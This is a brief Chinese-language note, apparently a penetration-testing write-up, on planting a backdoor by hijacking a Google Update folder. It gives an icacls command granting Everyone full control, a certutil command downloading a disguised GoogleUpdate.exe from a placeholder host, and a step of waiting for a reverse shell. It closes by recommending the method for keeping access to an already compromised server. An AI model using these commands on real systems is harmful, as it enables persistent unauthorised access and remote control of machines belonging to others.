1、默认低权限无法写入：

2、配置低权限可操控：icacls Update /grant everyone:f

3、下载可执行程序：certutil -urlcache -split -f http://ip/GoogleUpdate.exe GoogleUpdate.exe

4、等待反弹shell：

总结：
1、利用难度：挺难的吧，看管理员如何配置了，默认情况下无法进行利用，但是拿下服务器权限后可以作为一种权限维持的后门来进行使用